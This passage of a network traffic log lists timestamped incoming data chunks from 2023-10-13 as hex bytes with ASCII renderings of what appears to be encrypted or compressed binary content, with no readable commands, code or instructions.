49 64 87 3b 67 1d b9 b8 37 bf ec 8b 48 19 a1 13 c5 21 75 Data Ascii: sY{!=7%m:~sYZRp0j}rw;#vL%9/.do\}9Jl3b,jVq\|o'\{3j@qbl4~I-'a*Ev;]D-8rLFvAA[n:F>cYzfUZ4EL9Id;g7H!u
2023-10-13 13:21:14 UTC	5166	IN	Data Raw: ea c5 4e bb a6 86 8e de 07 a1 dc 11 82 88 7d bc 23 3c ea 73 d4 6d 2e 2f b8 0e 25 9b d4 80 a3 4d 1c f2 19 24 e4 ed fa c0 76 57 c0 27 7e 84 00 a0 18 09 55 5a 88 f6 bb 4a 51 5d 9d a0 01 88 42 bb cc 3f aa d7 c2 bb 39 70 ea 16 52 fb 1b dd 1b 8e 7c 24 9a e0 7e 93 57 e7 4c da 2f b7 0b e5 4b f5 1d 2b 11 bc 72 84 f2 ff d2 cd cf 2c 45 d2 4a 95 09 77 30 2d c9 77 17 f3 8f fa 50 53 55 4f 79 d6 6a ab 65 3b 19 da 87 d7 e5 f0 e9 34 c4 52 da 80 00 b7 72 3f 5e 84 32 38 29 37 a1 16 ee 4e fc 61 ee b0 d7 f4 17 5c 77 eb 29 69 06 62 81 56 8d 40 57 18 e4 bb 22 59 1f 16 73 02 bd e3 ca 5d 49 8f d7 aa 0e 7a 7c d4 94 44 36 9a a0 1f 49 52 cb 2f af d6 ca 8d 91 4f 0a 3d e7 6f 4f df 51 2d 03 fe dd 8f 20 2b eb 22 a3 80 d0 8f 36 62 11 88 b5 62 47 be f0 fb 9f 3e 31 80 08 76 2f e2 72 ed 7b Data Ascii: N}#<sm./%M$vW'~UZJQ]B?9pR\|$~WL/K+r,EJw0-wPSUOyje;4Rr?^28)7Na\w)ibV@W"Ys]Iz\|D6IR/O=oOQ- +"6bbG>1v/r{
2023-10-13 13:21:14 UTC	5182	IN	Data Raw: 6b 5b 20 52 7f 5a 8f ee 05 1c fe 90 95 32 96 20 fb dd 9a ed 6d 28 b5 48 52 a5 0c ab ad 48 f8 9c e7 d2 eb 29 fa 2d 54 51 62 e3 39 c4 34 e4 e3 f7 d1 62 1d 0c 7a f0 d0 82 30 00 fb 1f 57 82 a0 28 d0 b5 aa ac ab 72 26 d4 bc e5 02 78 1a 3f ec 32 95 28 d8 7b f0 ce 7b ba c8 7d 1e 31 ad 23 92 5f 97 0c 77 4a 9f a2 d6 3f 45 28 b5 24 f7 e0 38 7a 81 b2 9e f3 e6 e8 d7 9a 26 77 6c 54 1a bd db 3f 97 09 74 8c 01 1e 21 e5 45 e4 9e d0 34 43 02 bf aa d6 1d 75 a3 56 06 3f a0 55 44 37 9c 8c 07 fd 59 14 56 51 47 3f 55 4a 0e 30 e4 bb 6e b3 55 56 d7 52 d9 55 b5 f4 81 3f 37 3c 72 0b 98 73 ba 43 b8 cd 15 55 f3 90 54 7f f9 df cf 25 c5 f8 c0 51 96 fa 4c 52 81 5e c4 07 86 8b a7 dc b9 53 df 31 82 16 66 0e 70 6b 59 03 f8 0a 6a 77 c2 15 70 8c 74 7c 85 96 c0 a0 24 54 c4 c6 67 96 3b 9f d2 Data Ascii: k[ RZ2 m(HRH)-TQb94bz0W(r&x?2({{}1#_wJ?E($8z&wlT?t!E4CuV?UD7YVQG?UJ0nUVRU?7<rsCUT%QLR^S1fpkYjwpt\|$Tg;
2023-10-13 13:21:14 UTC	5198	IN	Data Raw: 6b 12 73 44 84 fd 19 03 09 dd c1 d8 c7 14 98 f0 69 c5 d3 f0 df 79 31 d0 95 f6 6f 94 42 32 88 a9 75 47 50 46 dd 58 76 bc c7 9f 5b 9d 63 53 32 e0 d0 bd 99 61 29 4d 16 ba 93 27 ea d0 fa 0d b5 08 39 44 09 7c d3 82 b8 19 ac 01 9a 13 ac c8 46 5e 4c 1f 48 02 8c 62 18 2a 36 51 da d6 9f 0b aa 22 b0 80 4c 56 a2 ff 42 e0 b4 6b 84 f2 c7 af 94 3c 35 10 c7 bc c1 48 61 8f 7e 17 dd 25 2c 00 15 18 30 87 26 a4 83 8c d3 29 28 75 06 fa 1f 41 14 ee aa c1 1f c2 71 9d 97 f1 5e c2 a5 9d b9 68 ff df b6 48 b5 b3 ee 01 4d ca 84 e5 91 1a c9 60 c6 45 72 52 75 ba f7 86 f7 e4 54 66 97 1a ff ad 51 f4 10 73 a0 80 06 b5 79 43 8b a7 39 93 70 a0 78 00 2f 82 5f 2b f0 98 0c c5 d2 20 e3 56 9a 0a 9d 6e c0 43 9b 3a 52 81 f5 15 bd d3 a9 5c 81 2e 55 c6 22 1b 23 22 5f 13 c5 93 26 e5 2a 27 df 71 aa Data Ascii: ksDiy1oB2uGPFXv[cS2a)M'9D\|F^LHb6Q"LVBk<5Ha~%,0&)(uAq^hHM`ErRuTfQsyC9px/_+ VnC:R\.U"#"_&'q
2023-10-13 13:21:14 UTC	5214	IN	Data Raw: c3 25 27 99 2c 79 c8 44 3f fc 4b 7f ae 3f 68 6c 32 74 cb bd 53 2d a0 2c 3d 3d df 52 5c 22 7a 72 e5 5f 46 66 02 b3 25 bc bd 4d b9 ac b5 37 dc 54 0f 05 fb 2d 8e 1e 08 5e 1e a5 b3 20 68 99 57 2c 46 d3 3c 76 44 d6 26 67 b7 56 dc 23 1b a1 a5 86 29 b1 ec d0 bf 2e 0b ed 93 93 66 43 29 34 98 b6 f2 a2 2b 21 85 20 81 14 08 24 3c 3d 23 a1 21 fa 7e fd 14 3a 93 c1 54 79 8c da eb 27 c2 52 a9 17 ba 9a 40 e5 7a 8b b4 77 73 f6 78 f6 a4 68 09 58 08 10 a5 b7 d5 4b 76 af 8e a5 44 36 b0 e4 86 10 cf e3 e7 43 08 db 4d 07 09 a9 74 f2 d3 03 71 23 ec 7b 8b 6c 6a 96 7c 9d f2 da f0 9f d1 d8 cc 11 a7 a8 46 39 b7 2f ae 2f 74 61 48 64 e8 ff 2f e6 18 d9 a4 38 b6 64 ba d9 4e d1 d9 5e e0 ad 28 19 c3 d6 38 49 4f fc c2 d8 39 10 1c 70 9e 36 06 18 7d 19 90 f9 0e 43 88 59 b9 84 43 a2 8a 5a 1a Data Ascii: %',yD?K?hl2tS-,==R\"zr_Ff%M7T-^ hW,F<vD&gV#).fC)4+! $<=#!~:Ty'R@zwsxhXKvD6CMtq#{lj\|F9//taHd/8dN^(8IO9p6}CYCZ
2023-10-13 13:21:14 UTC	5230	IN	Data Raw: 85 e1 a7 86 92 8f e4 6a 7b fe 3b c0 c2 73 a7 9a 6f 77 d4 af 0e 2d 8f 5a ec db e5 98 2f be b9 6c c3 0f 26 44 68 d7 7a d1 cc f0 75 09 40 cf 73 e0 c1 ac 6e 0a ca 84 f8 48 c9 88 4b 76 c7 b7 8c a9 40 5e 67 62 48 91 bb 77 1d 8e c3 d2 14 2a fc 3b e6 13 b5 8a c4 a0 f4 12 9f 63 2e 42 b9 74 25 9c 58 47 d9 95 27 f5 17 3b 60 4b 55 f9 65 fd 36 02 95 55 3c 21 a6 3e cd 40 9f 64 93 7a c0 af 92 29 4a c4 b7 cd 40 b5 e5 15 12 77 f9 db 29 e3 da 3c db 82 57 2e ac 3c e8 30 9c 8c ae 6e cd 29 6f 6a c0 dd 5f 86 29 d9 f3 45 9b d8 0b a0 d5 83 74 74 9f 6d 07 00 75 7c 8d 9a 18 e3 13 1a 10 4e dd 04 17 10 e0 ec 6a 2b f6 0d ed 63 11 f6 c6 51 e1 d5 b2 50 40 fc dc 2c 5e de 64 c2 4b c0 98 5b dc 00 af e7 72 2b 7c 46 70 91 8d fd 50 67 92 2c 18 d9 dc 6b 06 d6 7b 36 5e 85 d6 f7 43 2f 1f fb 1c Data Ascii: j{;sow-Z/l&Dhzu@snHKv@^gbHw*;c.Bt%XG';`KUe6U<!>@dz)J@w)<W.<0n)oj_)Ettmu\|Nj+cQP@,^dK[r+\|FpPg,k{6^C/
2023-10-13 13:21:14 UTC	5246	IN	Data Raw: 96 e0 28 2b 10 1a 39 58 ef fd f0 db 55 e2 ca 65 88 1e 09 fc 37 65 47 85 58 8a 96 82 de c6 d3 69 54 a0 19 ee bf 93 0f e9 3a e7 dd 46 71 1d 83 9b 68 e0 b1 ca 2a 75 6e bd 1b 72 2e 04 33 ea 9b fd 2f be 23 f8 65 08 f3 04 62 fe 0b 90 25 a3 95 96 bd 80 33 5e 57 23 2f 18 82 b5 3f e6 29 a1 16 4d c7 c1 10 d9 a6 0a e2 2f 34 6d ab a8 89 93 f8 42 c1 ea 2c a1 2e 3f 39 18 57 9b 5f 31 47 fd 58 0a 63 69 d2 50 92 8b b1 84 4b 86 aa 91 63 eb d5 5d 9f 31 3f 11 2b 0e f3 80 bf 99 fc 35 c6 ec 46 31 30 90 92 bf 22 55 6e 7a 9a 92 1b 49 66 5a e5 15 75 d8 7b 76 a2 f2 07 05 72 c3 7c 15 11 a4 8c d3 6f 8d 5a 25 76 60 ea 4d d1 9f 5c 54 48 63 12 c1 c5 b6 5b 8e e2 bf 7a af 45 57 33 3c 15 0b 3b c3 b4 dd a4 47 c9 90 87 12 a1 0c b1 b5 5c 38 32 b7 d6 bf 00 f7 b8 e3 fa ed a3 79 fa 2b 44 f2 27 Data Ascii: (+9XUe7eGXiT:Fqh*unr.3/#eb%3^W#/?)M/4mB,.?9W_1GXciPKc]1?+5F10"UnzIfZu{vr\|oZ%v`M\THc[zEW3<;G\82y+D'
2023-10-13 13:21:14 UTC	5262	IN	Data Raw: a2 bb dd ad 42 5a ff 94 05 30 32 72 30 d2 e3 cb c5 ef 23 60 04 a3 f5 5f 7a 5b 51 ae d6 54 1e 9a 10 a1 fa 4c ea a6 39 5e c8 58 85 b6 6a 5b 89 fe 3d a7 e4 b6 7e a3 50 e8 2a d1 bd 91 44 67 f0 52 4f 04 76 a7 3a 8e 88 58 68 9d 47 06 6e c7 a2 94 fc 9f 59 ef d4 60 54 ad 23 2f a0 c0 30 08 17 2c ec a9 58 a9 25 4c 35 04 c6 ce ec d6 a0 bb f0 d6 d3 50 a3 b1 4f 3a e9 4a 32 7d 8d 83 93 58 41 c1 2a fb 2f e0 cd 1f d9 fc 6b 7e f0 38 44 50 e1 67 3e 99 d6 6a 55 7e 23 cb cd f6 a1 fd 84 04 da 8e 03 7c f8 46 c8 9d 61 02 89 aa 54 dc 7f b7 be c3 3c 9a 62 ab f4 f9 2f 45 fb 1e 54 ba 40 35 ab b0 76 4d 87 a9 8e 00 03 15 6d 60 50 76 7c bc 7c 88 c3 60 91 94 61 fb 2b 4f 5c 5e 63 a3 b7 3b 9c f1 60 a5 9f 77 89 24 5f b5 ef 2b ba bc 00 2b bf 46 c5 0e 9c ef 6e 36 6e 6e 5b 3b 15 d6 e0 60 ec Data Ascii: BZ02r0#`_z[QTL9^Xj[=~PDgROv:XhGnY`T#/0,X%L5PO:J2}XA/k~8DPg>jU~#\|FaT<b/ET@5vMm`Pv\|\|`a+O\^c;`w$_++Fn6nn[;`
2023-10-13 13:21:14 UTC	5278	IN	Data Raw: b2 10 51 21 06 b8 c3 74 12 e3 8e 22 44 43 73 12 4e 78 04 73 14 aa 38 19 68 87 6e b7 2e 8b b1 6c 26 0c ac dc fd 5b 27 3b 27 30 1c c0 41 33 96 c0 05 ca 80 21 5f 70 bd a2 d4 63 1d b7 ee 80 f0 e4 60 51 ae a0 8f 3d 8e a0 a9 9e 1b 58 31 be ff 8d 2b ab e7 89 47 68 2d 21 bb e5 52 58 ab c9 f3 b6 fd ec 08 74 dd 6a 9d f7 6a 47 ee 63 f9 70 66 06 2e bb ad 5c 6f 48 1c 4e 13 e8 f3 88 94 e8 ce cb ee f1 54 85 7a 9c 1c 90 8c 9d 4f 0d 77 9c 16 66 08 48 93 ec 05 e8 e5 6f 4c 3a 29 7d af ff 8d 5c bd 83 50 5b 8a 3e c7 88 63 0d 57 b6 e9 81 35 90 c5 49 53 65 74 7c d9 7a ce b4 a2 4c 67 34 27 f3 a0 10 ba d3 b5 c2 1f 82 f4 0a f7 4f 06 81 cc e4 b2 b0 b3 65 53 fc 0a 90 ac fe 34 02 92 39 d4 64 0a 83 eb 71 87 5f 7d 77 ab 83 7f eb 15 86 cb c6 03 94 1f 46 74 57 4a 96 93 f0 88 21 3f 82 90 Data Ascii: Q!t"DCsNxs8hn.l&[';'0A3!_pc`Q=X1+Gh-!RXtjjGcpf.\oHNTzOwfHoL:)}\P[>cW5ISet\|zLg4'OeS49dq_}wFtWJ!?
2023-10-13 13:21:14 UTC	5294	IN	Data Raw: 7c 40 00 59 f8 b1 0b 95 d6 83 d1 7b 48 e6 18 1c 47 57 09 d1 a6 76 04 8a d4 4a 72 8d 2f c9 e9 b2 52 a4 32 6f c1 f6 a3 d4 d5 60 00 44 ef 7f aa be 57 19 57 6d f0 13 55 b0 5a 66 c8 47 d5 7e f6 4e d8 eb b0 5e 33 70 8d e4 e5 c2 06 61 51 58 8d c4 46 f9 f4 36 e7 db 3c 5a 11 9e a2 0f 48 15 41 c9 f2 ea 34 8a 13 51 dd 88 1b 8c 56 f9 8c c2 67 24 33 6b fe 2d 8e 2f 89 8a 86 3b 38 6b e5 2b ad 81 8f 5a df e7 5a 92 04 29 7c e2 30 ff 0a 89 56 39 b5 1d 29 b3 1b 3a 56 68 9f 54 1e 59 78 c4 1c 88 f5 b7 45 32 48 91 b6 6a f3 5f 96 56 01 af 68 31 9b 20 3c 0d 54 b2 a6 0e 5a 60 fe ad 71 a3 1f 0b 98 f6 8f 35 13 f5 76 a0 f2 6f cc ad f7 c5 55 60 41 2e 9b 19 ed 3f e7 3d da ea eb f5 f2 42 a9 a6 75 e7 09 12 6d a7 8d a8 4a f3 3a b5 bf a9 ee cb 32 13 1d d4 80 ea 71 cc 09 ba 7a ac 06 e3 33 Data Ascii: \|@Y{HGWvJr/R2o`DWWmUZfG~N^3paQXF6<ZHA4QVg$3k-/;8k+ZZ)\|0V9):VhTYxE2Hj_Vh1 <TZ`q5voU`A.?=BumJ:2qz3
2023-10-13 13:21:14 UTC	5310	IN	Data Raw: ca ad 87 0b 60 70 8d b9 39 43 ad 33 f5 1d c9 ed 9a d4 7a c0 e5 b3 4f ba 30 ae 60 9f 54 51 26 97 dd 58 15 44 8d f4 74 a2 5a 9d 1d 9e 1f 1e 43 5a f8 b8 7e b5 bb 24 66 a2 a8 bf d3 a9 78 a5 9d 35 1e 02 45 02 f1 fd 3f 79 55 93 eb d4 31 9b bf b2 e9 71 4e 1e cd cb 9e bd 0b e3 ea 20 48 92 c8 e4 0b 9b f6 66 a6 02 72 19 1f 0f 1b bd ee 84 6a dd 67 07 80 6b ca 46 e6 82 fd cb a5 72 b8 c2 89 b8 0e 5e e2 13 ee 3c 15 a3 0f 3f af 90 9d ec 9e cb 19 e9 ae be fc 9b 90 74 d0 f0 0d 6e 7e 2b e3 65 b8 b7 13 4d 42 6c 66 9e e9 a2 cf 77 7c cf 49 58 54 54 cc c8 6a 5d f3 c4 a3 2e 57 7a 71 8d fc f3 44 93 5d e3 a9 06 1e e4 31 c0 68 a9 ba 54 15 de 1f 4e 72 92 67 64 60 75 41 52 54 d0 88 6b 96 38 50 10 48 25 53 1b 60 34 a4 bc b5 47 d7 32 94 5d 6a 2f b7 61 01 41 83 de 10 5b 62 fd 72 3f 2e Data Ascii: `p9C3zO0`TQ&XDtZCZ~$fx5E?yU1qN HfrjgkFr^<?tn~+eMBlfw\|IXTTj].WzqD]1hTNrgd`uARTk8PH%S`4G2]j/aA[br?.
2023-10-13 13:21:14 UTC	5326	IN	Data Raw: 2c 58 93 78 bc 3b cd 4f 06 73 ff b2 ba 26 33 33 27 aa bc 65 8e cc ea 25 72 f9 b6 c0 27 4f 27 65 99 d0 75 4a db 20 a5 c6 70 cc 0d 67 5b 46 3d 81 33 c5 51 76 f5 10 ba 46 4c 06 26 81 f5 90 96 0a 86 c3 aa a3 a1 f2 6b d0 c8 ba de 67 e0 d3 e0 3e 3c 89 72 3a 26 63 8d 02 84 a3 ed 06 ee 84 75 ff 1b 85 56 2a 6d 8d af ef ff ec c7 d2 82 ea 93 39 98 38 cb 5f dd b1 4a aa 72 99 a6 4a 9e c1 1f fd 62 0f f0 16 ca 81 93 45 b9 ae 3d 00 fb ca 5f 07 f3 f1 3c 2f 5f 0d cf 12 5a 08 c0 42 ac 6c b2 3e b9 ab e1 3d 3a 09 75 94 f7 af ef aa ce 36 0d 87 34 30 74 f1 28 90 08 93 07 7a 0c 2a 60 63 21 32 34 74 68 b0 7a 90 51 64 f6 9e 6d ab 44 33 a4 e6 9d 24 ab 39 50 2c 7e b0 5d 21 bf 81 44 52 15 e3 a0 04 af a8 2e 5c 7e 96 48 68 2e 7d 56 38 ce fb e9 16 33 61 30 f5 e9 a6 76 12 17 f7 9b 33 f0 Data Ascii: ,Xx;Os&33'e%r'O'euJ pg[F=3QvFL&kg><r:&cuVm98_JrJbE=_</_ZBl>=:u640t(z`c!24thzQdmD3$9P,~]!DR.\~Hh.}V83a0v3
2023-10-13 13:21:14 UTC	5342	IN	Data Raw: 22 98 9c cb 77 ea 0e 98 ff 9c a2 64 d1 47 d5 ce b9 f6 54 ea e4 bc ec d8 61 1d 21 32 ba 32 3e 07 bb f0 95 d4 44 0d ef 12 81 71 15 07 43 a0 cd fd db 12 28 02 78 9b 03 9e 3f 26 a4 d8 ff fc b6 9a 5a cc 09 ea 02 5d 29 32 da b3 69 e6 92 98 32 16 55 48 52 d2 2c 0d 35 48 1b ac 47 b8 98 59 ba e4 6b 14 03 14 f3 13 7d 9d 6e f8 08 4c f0 ea d0 63 72 56 13 fc ed b4 1f 33 74 c1 ed 3f 56 bd 49 d4 c7 10 1b 94 03 b5 89 53 7a ca b1 9d 0c f6 42 73 e2 c0 bc 29 68 06 5a ad 45 3c 25 c9 fe cc c8 48 47 b8 65 37 06 1e 6c ff 9b 5c dc ac 7a 5d 39 5e 6e 0f c9 c0 68 fd b4 bf 82 b4 1e e9 40 9b 0d 30 6e b3 ed d5 a2 66 56 b1 db c1 13 60 0b bd 6c 93 d9 74 89 f2 f4 eb bd 0f 40 3c 08 df 4e 7d 72 55 67 26 99 9e 5f fd f9 fd 77 42 5c 34 96 4d ba a5 6f 37 39 5d 5c 34 a8 e2 2e c4 fb 05 83 f2 c7 Data Ascii: "wdGTa!22>DqC(x?&Z])2i2UHR,5HGYk}nLcrV3t?VISzBs)hZE<%HGe7l\z]9^nh@0nfV`lt@<N}rUg&_wB\4Mo79]\4.
2023-10-13 13:21:14 UTC	5358	IN	Data Raw: fe 71 e0 20 84 e2 1a 99 da da 07 6d 57 c1 e3 ac 75 84 b3 17 00 96 aa ba 0a 85 35 74 07 7b 59 e6 c0 d7 78 be 9f 13 93 0b 4d 37 fd 3e ee 9a 8e 19 fc eb 1a f2 a9 de b0 e0 58 a4 cc 8a 3f 26 f1 5d 44 10 51 f2 bf 97 5a f0 e9 b9 dc 57 8b 1d 38 a0 59 01 4c 49 2c a8 c0 1b 6d 6b 23 dc d2 46 54 14 b7 c6 e3 ec e0 d9 5c f5 df d6 05 6d d7 8f 0f 6e ca 5d f8 50 5e 98 33 8e d7 a5 b3 c7 c8 cb 6a ae 6f 23 bd 4e b1 c0 8c 8d cc 51 a0 07 8a 1d 5c 0d 4a 4f c2 88 8a d0 6e b9 38 59 73 f0 2d 09 f3 56 4e 6a 8b c5 78 41 e8 d0 f9 7c eb 11 da 51 0e 61 38 8e b4 de e7 6b a2 e8 f3 ee 2d 00 e4 7d a1 67 c3 3c dc 8f f4 7e 8c af d8 21 fa 81 43 da c3 91 2e 11 55 09 d2 ac 0f 05 46 dc 75 1f 61 29 5b ab a8 eb 23 5d e7 a0 cc b5 e6 67 69 56 70 01 86 aa ca 6b 78 a6 27 45 0b 6f bb c0 f4 06 75 5d 10 Data Ascii: q mWu5t{YxM7>X?&]DQZW8YLI,mk#FT\mn]P^3jo#NQ\JOn8Ys-VNjxA\|Qa8k-}g<~!C.UFua)[#]giVpkx'Eou]
2023-10-13 13:21:14 UTC	5374	IN	Data Raw: 62 51 76 bd e1 84 76 9b 4a 6d cb 1d 9f dd 77 8c 22 6c 1f a4 f1 2a 6d e0 46 58 dd 0c 0a c5 46 18 83 d1 a6 8e 97 70 53 54 bc 6a 4a e9 39 ec 6e a9 5c dd b1 86 a1 01 03 61 4f 6d 24 78 08 f5 0b 78 19 aa f3 27 a2 00 c4 0c 21 3f 82 67 11 35 ea 7d be b4 8a 32 41 69 82 9c 1b 25 67 de fa 34 e5 fd 0b ee b3 b8 a7 c2 94 bd c8 e2 59 f6 0f 2b 68 23 e1 44 2d 4d a5 3b 93 6f ab 97 bb af f4 a1 1f df 42 ed 7a c7 97 3b 94 39 bc 60 62 60 89 1a 4f 0c 7f 88 16 85 59 53 cb 04 12 84 58 5a 0b 75 2a 4c a9 ce a6 f6 8d 62 dd 44 22 32 1f 66 a9 ed 43 f2 46 b6 39 27 ca d5 d5 83 69 f2 de 4c 1c f9 60 26 57 d1 5d e0 45 e7 02 96 d5 af 7e a5 0d 07 0e 2e a7 22 16 c6 97 89 09 5c 37 b8 70 af 11 f8 03 11 de a9 c1 80 d8 30 c7 f5 97 06 fe f0 46 8e a9 9d e5 8d 4b 4f 2e 5e 76 de 43 31 5d 33 91 1b 5d Data Ascii: bQvvJmw"lmFXFpSTjJ9n\aOm$xx'!?g5}2Ai%g4Y+h#D-M;oBz;9`b`OYSXZuLbD"2fCF9'iL`&W]E~."\7p0FKO.^vC1]3]
2023-10-13 13:21:14 UTC	5390	IN	Data Raw: 72 2f 17 d3 af a6 86 3d f0 1a fe 24 44 39 8f 21 e8 21 d5 18 41 13 a2 97 04 34 27 1e cb dc 14 f2 b9 f7 b4 f1 3d 28 0e 54 34 a6 79 41 5d 2f fb 1f ae ee 9d 5c ab ea 9d 33 1a 83 c5 3f 11 f9 b0 60 09 35 f1 cd 2c 39 d6 3e 68 39 0e 64 2e db dd 79 4d d1 7a 3c 13 8c a8 e5 64 01 b0 4a 19 35 7c df c9 6e af a7 ef 21 ea ed 6b 3c 18 83 e3 4c 4f 02 6d 8e a0 fc 95 5d 91 d7 06 cc 35 ac ba a9 e2 dd d6 0c b2 ac ff d1 d4 79 a7 e4 75 1d cb c7 e8 d9 26 25 e3 f0 94 48 27 a5 da 13 43 4f a7 01 cd 3d 09 66 1a dd f1 1f b6 06 bf 0f be 73 35 59 41 86 23 0a b6 06 0b 2f b3 4e c8 6e b0 ee f0 4e 8c 10 31 4c 39 57 b2 92 79 5e 88 97 05 df e4 95 b1 05 d3 d7 5a 4e fd b6 fb 9b 7a 77 60 38 ce 51 e8 8c cd 15 91 9a 68 6f 9f 9f 3a b4 5a 6f fb af ac ab c2 bf 16 ec fa d6 21 25 eb df 7d 51 76 29 67 Data Ascii: r/=$D9!!A4'=(T4yA]/\3?`5,9>h9d.yMz<dJ5\|n!k<LOm]5yu&%H'CO=fs5YA#/NnN1L9Wy^ZNzw`8Qho:Zo!%}Qv)g
2023-10-13 13:21:14 UTC	5406	IN	Data Raw: 33 7e 55 ac e0 11 3c c2 e0 64 53 14 17 21 93 8e 30 50 49 dd fb 70 34 ea 17 5d 67 60 99 fe b9 f1 b6 c3 1c 46 58 95 79 74 7f 0c 26 3c d2 8a d7 ec b4 9a 2b f3 fd a8 18 18 85 61 34 51 39 a5 f2 ef 59 19 a4 b9 a5 a7 35 5f 12 46 b1 6d 13 93 d4 e3 0f 82 24 77 03 05 21 b7 c3 0a 40 3b be b2 27 f6 25 b9 52 6d 26 fc 29 56 5e be c2 65 e0 35 29 2b 26 f4 1b ca da 45 a9 dd be 8a 86 8f 29 52 9f cc ee 21 2f 6e 11 dd 86 b5 06 ad de 5c 85 c5 5c f3 be e1 b6 26 02 2d 06 28 23 94 c0 a1 2f fd 08 94 f5 25 2a 1a a4 f9 4c 55 ea 81 ac 43 55 85 7b 40 44 de 45 62 2c 09 56 f8 e8 e1 6a ae c2 6f a2 0d 6f 8a 28 ae 74 1c d8 f1 a6 63 73 91 56 9d d3 01 07 e4 67 79 a7 b9 62 d4 0c 45 7e 04 0a 90 a8 b2 21 2a 37 08 2f 17 a3 e4 e0 1d cd b4 d6 9b 58 88 cd cb 05 d7 5e 71 27 4e 92 1c 83 ea af 3f 4d Data Ascii: 3~U<dS!0PIp4]g`FXyt&<+a4Q9Y5_Fm$w!@;'%Rm&)V^e5)+&E)R!/n\\&-(#/%LUCU{@DEb,Vjoo(tcsVgybE~!7/X^q'N?M
2023-10-13 13:21:14 UTC	5422	IN	Data Raw: 44 c4 ae 1e 71 c1 34 ca 68 99 58 e5 2c 86 a7 13 95 14 96 1e 81 ad 37 70 5c 2b 44 f8 24 e1 7e 7c 4d ef e5 ca 71 0c e3 4b d6 7e b5 86 48 f8 de 40 6c a7 32 bd cf ba 5e 00 20 0a e4 5b 00 8a 12 4f 4e 83 12 d9 01 13 b0 26 d1 8a fa 78 98 9d 66 22 bc f8 db 7c 34 39 41 25 ca a3 6b 36 e6 6b f8 29 3c f8 51 3e c6 90 f5 06 a2 0f 4e 3c 91 2c 2d 8b 83 d9 17 04 76 4c 5e d9 7a e7 6a c2 b3 68 97 87 3e dd a8 33 ad be 42 58 a8 54 b3 a2 17 ff eb e9 19 9c 2c 41 53 71 35 25 f8 e8 f4 e8 6e 24 d6 b3 32 1f f2 76 79 0e 95 53 41 f2 85 84 81 39 86 0a 75 ef b1 94 32 9a e4 de 8f ab 4e 3a bf ae 6e 47 fd d0 18 61 8d 36 1b 7f d5 ee 17 1c 58 42 96 5f 47 3c bd ce 29 8e bc 50 bd cf 59 92 df 37 12 52 f2 2a bb 8b 38 2f ff b0 41 58 f0 44 48 29 59 7b 99 fb 66 3a 59 cb 22 9f 12 89 73 b1 b4 ff 78 Data Ascii: Dq4hX,7p\+D$~\|MqK~H@l2^ [ON&xf"\|49A%k6k)<Q>N<,-vL^zjh>3BXT,ASq5%n$2vySA9u2N:nGa6XB_G<)PY7R*8/AXDH)Y{f:Y"sx
2023-10-13 13:21:14 UTC	5438	IN	Data Raw: 9f 35 bd 0d 63 6c d0 fc 54 61 e0 b0 46 c8 92 1f 32 ef 35 c7 50 bb 34 d2 25 39 ce 38 a1 44 93 aa 6b ca 30 b3 87 1f f5 24 31 66 fc a8 bb cb 0f 6c 0e 73 30 7c fb ba 16 8b ad f8 c9 69 e2 9d 73 2d 99 8c 26 74 61 ce e1 e8 83 da 18 e5 08 49 97 2b 4f 49 6a 98 35 7c 9c 4d 13 e5 da ca 5e 75 53 dc b1 6b f5 1e 2f ef dc 07 ca ef 08 b4 d1 cc c2 e8 9b ae ce a1 5b 42 cd 32 e1 1d 0c da 45 fd aa 0a 6e 6a db 65 54 97 37 b9 74 9c 58 21 a1 6d 28 2f 8b 29 65 42 57 c7 2e 02 c6 7a fb 8d 5e 18 f3 0a f7 9e ec cf 24 7d d3 36 e0 bc dd 63 cd d4 71 bf e9 68 72 cf be ba 15 c4 3e b0 ff 20 32 ef b6 e8 b6 a5 b6 74 82 ce a2 18 9d cd a7 24 fe 1a c9 ce 6b 4d 8c 71 c2 f4 0f c8 37 90 50 12 94 71 74 10 b6 92 c9 a1 2b 28 6a f1 25 b0 00 42 4f 2d 08 dc d4 65 1c a9 4b 00 1e 25 2c 06 ea 96 92 f9 01 Data Ascii: 5clTaF25P4%98Dk0$1fls0\|is-&taI+OIj5\|M^uSk/[B2EnjeT7tX!m(/)eBW.z^$}6cqhr> 2t$kMq7Pqt+(j%BO-eK%,
2023-10-13 13:21:14 UTC	5454	IN	Data Raw: db 5f 46 6e 76 50 bf 4f 0a 42 f6 d0 f4 b7 f5 79 98 5e 5f e8 61 3e c4 c4 fa 7a 7f f2 a9 7b 84 b1 aa 77 9f 1b 3b 47 47 d0 5f d7 0c db 55 98 4e 97 67 fd b5 e3 b0 ce 26 29 9c e3 f5 bf 23 74 65 9e b8 59 0d 7b 35 5b 09 e5 7a 4a 51 6f f5 62 75 0a 6b 74 80 3b a5 06 bd f2 80 b2 71 0d df 2a 7a 95 88 57 78 34 25 a3 b5 cb 7f 91 ea ce 5e fd 48 b4 1b 3d c6 99 00 af da 4d f9 1f 87 3c 5d 4b a2 e1 66 b6 f7 cb 0c 3a 0b bc bf 58 f7 e5 c6 1c 41 51 75 56 48 a4 af 80 1b dd 33 47 9d bf e9 8a 8f 68 8f c7 b2 95 3b a8 ef 55 94 a1 42 7a ba d2 ce 44 d4 69 d7 a4 fd 22 ab 5e 0a 18 37 11 80 ef a0 e1 f8 96 34 78 4a d0 83 cc 7f 6e be bc 14 37 be d2 8f c6 c3 c6 68 d7 16 49 bd 7e 36 f6 87 ef 09 22 6d e8 a1 58 b8 1c da 24 59 3d 67 0b fd c2 97 a1 9d 00 02 1b 8d 34 10 dc 1a 53 86 9d 1b 2b 48 Data Ascii: _FnvPOBy^_a>z{w;GG_UNg&)#teY{5[zJQobukt;q*zWx4%^H=M<]Kf:XAQuVH3Gh;UBzDi"^74xJn7hI~6"mX$Y=g4S+H
